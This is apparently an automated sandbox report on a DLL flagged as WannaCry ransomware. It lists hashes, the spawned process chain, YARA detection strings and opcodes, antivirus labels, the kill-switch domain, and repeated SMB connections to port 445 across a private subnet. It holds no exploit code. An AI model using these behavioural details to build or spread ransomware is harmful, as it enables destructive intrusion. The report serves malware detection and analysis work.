Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xIwkOnjSIa.dll

Overview

General Information

Sample Name:xIwkOnjSIa.dll
Analysis ID:771981
MD5:98df58e71b5202e49ba6f9e6e43ef6ef
SHA1:7ee6e1082c30108ae631c6193878195c1abe7112
SHA256:b5d543c8a8334519f013bb236d43d0561088b52b0d5602ea9b58fc453f2c4156
Tags:dll
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Wannacry ransomware
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Connects to many different private IPs (likely to spread or exploit)
Drops executables to the windows directory (C:\Windows) and starts them
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for dropped file
Connects to many different private IPs via SMB (likely to spread or exploit)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Searches for user specific document files
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
File is packed with WinRar
Connects to several IPs in different countries
Queries disk information (often used to detect virtual machines)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5992 cmdline: loaddll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5980 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1648 cmdline: rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvr.exe (PID: 4252 cmdline: C:\WINDOWS\mssecsvr.exe MD5: 06F05FA7206B546118253C33D60541DC)
          • tasksche.exe (PID: 5152 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 06773C385B9F9A55B70067ED1D5739DE)
    • rundll32.exe (PID: 2348 cmdline: rundll32.exe C:\Users\user\Desktop\xIwkOnjSIa.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1108 cmdline: rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvr.exe (PID: 2220 cmdline: C:\WINDOWS\mssecsvr.exe MD5: 06F05FA7206B546118253C33D60541DC)
        • tasksche.exe (PID: 1760 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 06773C385B9F9A55B70067ED1D5739DE)
  • mssecsvr.exe (PID: 4672 cmdline: C:\WINDOWS\mssecsvr.exe -m security MD5: 06F05FA7206B546118253C33D60541DC)
  • svchost.exe (PID: 5948 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1108 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3312 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4704 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5976 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5040 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5564 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1652 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5936 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5380 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
xIwkOnjSIa.dllWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x353d0:$x3: tasksche.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x5449:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
xIwkOnjSIa.dllJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\mssecsvr.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0x3136c:$x3: tasksche.exe
    • 0x31344:$x8: C:\%s\qeriuwjhrf
    • 0xe034:$s1: C:\%s\%s
    • 0x17338:$s1: C:\%s\%s
    • 0x31358:$s1: C:\%s\%s
    • 0x2e68c:$s5: \\192.168.56.20\IPC$
    • 0x1ba81:$s6: \\172.16.99.5\IPC$
    • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
    • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
    • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
    C:\Windows\mssecsvr.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
    • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
    • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
    • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
    • 0x1d439:$s1: __TREEID__PLACEHOLDER__
    • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
    • 0x1f508:$s1: __TREEID__PLACEHOLDER__
    • 0x20570:$s1: __TREEID__PLACEHOLDER__
    • 0x215d8:$s1: __TREEID__PLACEHOLDER__
    • 0x22640:$s1: __TREEID__PLACEHOLDER__
    • 0x236a8:$s1: __TREEID__PLACEHOLDER__
    • 0x24710:$s1: __TREEID__PLACEHOLDER__
    • 0x25778:$s1: __TREEID__PLACEHOLDER__
    • 0x267e0:$s1: __TREEID__PLACEHOLDER__
    • 0x27848:$s1: __TREEID__PLACEHOLDER__
    • 0x288b0:$s1: __TREEID__PLACEHOLDER__
    • 0x29918:$s1: __TREEID__PLACEHOLDER__
    • 0x2a980:$s1: __TREEID__PLACEHOLDER__
    • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
    • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e340:$s1: __TREEID__PLACEHOLDER__
    C:\Windows\mssecsvr.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      SourceRuleDescriptionAuthorStrings
      00000008.00000000.251873515.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000005.00000000.244617734.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000007.00000000.250229077.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            00000005.00000000.245185564.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
              00000005.00000000.245687308.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                Click to see the 12 entries
                SourceRuleDescriptionAuthorStrings
                7.2.mssecsvr.exe.1fab084.3.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
                • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
                • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
                • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
                7.2.mssecsvr.exe.24d38c8.7.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
                • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
                • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
                • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
                8.0.mssecsvr.exe.400000.0.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
                • 0x3136c:$x3: tasksche.exe
                • 0x31344:$x8: C:\%s\qeriuwjhrf
                • 0x17338:$s1: C:\%s\%s
                • 0x31358:$s1: C:\%s\%s
                • 0x2e68c:$s5: \\192.168.56.20\IPC$
                • 0x1ba81:$s6: \\172.16.99.5\IPC$
                • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
                • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
                • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
                8.0.mssecsvr.exe.400000.0.unpackWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
                • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
                • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
                • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
                • 0x1d439:$s1: __TREEID__PLACEHOLDER__
                • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
                • 0x1f508:$s1: __TREEID__PLACEHOLDER__
                • 0x20570:$s1: __TREEID__PLACEHOLDER__
                • 0x215d8:$s1: __TREEID__PLACEHOLDER__
                • 0x22640:$s1: __TREEID__PLACEHOLDER__
                • 0x236a8:$s1: __TREEID__PLACEHOLDER__
                • 0x24710:$s1: __TREEID__PLACEHOLDER__
                • 0x25778:$s1: __TREEID__PLACEHOLDER__
                • 0x267e0:$s1: __TREEID__PLACEHOLDER__
                • 0x27848:$s1: __TREEID__PLACEHOLDER__
                • 0x288b0:$s1: __TREEID__PLACEHOLDER__
                • 0x29918:$s1: __TREEID__PLACEHOLDER__
                • 0x2a980:$s1: __TREEID__PLACEHOLDER__
                • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
                • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
                • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
                • 0x2e340:$s1: __TREEID__PLACEHOLDER__
                8.0.mssecsvr.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                  Click to see the 53 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.38.8.8.859869532830018 12/22/22-10:04:13.266940
                  SID:2830018
                  Source Port:59869
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.38.8.8.859324532830018 12/22/22-10:04:14.725246
                  SID:2830018
                  Source Port:59324
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.38.8.8.861626532830018 12/22/22-10:04:16.970844
                  SID:2830018
                  Source Port:61626
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/URL Reputation: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/URL Reputation: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comURL Reputation: Label: malware
                  Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/pAvira URL Cloud: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/lAvira URL Cloud: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/0Avira URL Cloud: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/kAvira URL Cloud: Label: malware
                  Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/PAvira URL Cloud: Label: malware
                  Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/Avira URL Cloud: Label: malware
                  Source: http://ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20221222-2004-15a5-aec0-299192b1f656Avira URL Cloud: Label: malware
                  Source: C:\Windows\mssecsvr.exeAvira: detection malicious, Label: TR/AD.DPulsarShellcode.grbmv
                  Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/Rasftuby.cpsmo
                  Source: xIwkOnjSIa.dllReversingLabs: Detection: 92%
                  Source: xIwkOnjSIa.dllVirustotal: Detection: 90%Perma Link
                  Source: xIwkOnjSIa.dllAvira: detected
                  Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comVirustotal: Detection: 12%Perma Link
                  Source: ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comVirustotal: Detection: 10%Perma Link
                  Source: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comVirustotal: Detection: 14%Perma Link
                  Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/pVirustotal: Detection: 14%Perma Link
                  Source: C:\WINDOWS\qeriuwjhrf (copy)ReversingLabs: Detection: 89%
                  Source: C:\Windows\mssecsvr.exeReversingLabs: Detection: 97%
                  Source: C:\Windows\tasksche.exeReversingLabs: Detection: 89%
                  Source: xIwkOnjSIa.dllJoe Sandbox ML: detected
                  Source: C:\Windows\mssecsvr.exeJoe Sandbox ML: detected
                  Source: C:\Windows\eee.exeJoe Sandbox ML: detected
                  Source: 8.2.mssecsvr.exe.400000.0.unpackAvira: Label: TR/Rasftuby.cpsmo
                  Source: 5.0.mssecsvr.exe.400000.2.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 7.2.mssecsvr.exe.1fab084.3.unpackAvira: Label: TR/Ransom.Gen
                  Source: 8.0.mssecsvr.exe.400000.0.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 7.0.mssecsvr.exe.400000.0.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 5.0.mssecsvr.exe.400000.0.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 7.2.mssecsvr.exe.24d38c8.7.unpackAvira: Label: TR/Ransom.Gen
                  Source: 8.0.mssecsvr.exe.400000.6.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 8.0.mssecsvr.exe.400000.2.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 8.0.mssecsvr.exe.400000.4.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 7.2.mssecsvr.exe.400000.0.unpackAvira: Label: TR/Rasftuby.cpsmo
                  Source: 5.0.mssecsvr.exe.400000.6.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 5.0.mssecsvr.exe.400000.4.unpackAvira: Label: TR/AD.DPulsarShellcode.grbmv
                  Source: 5.2.mssecsvr.exe.400000.0.unpackAvira: Label: TR/Rasftuby.cpsmo

                  Exploits

                  barindex
                  Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
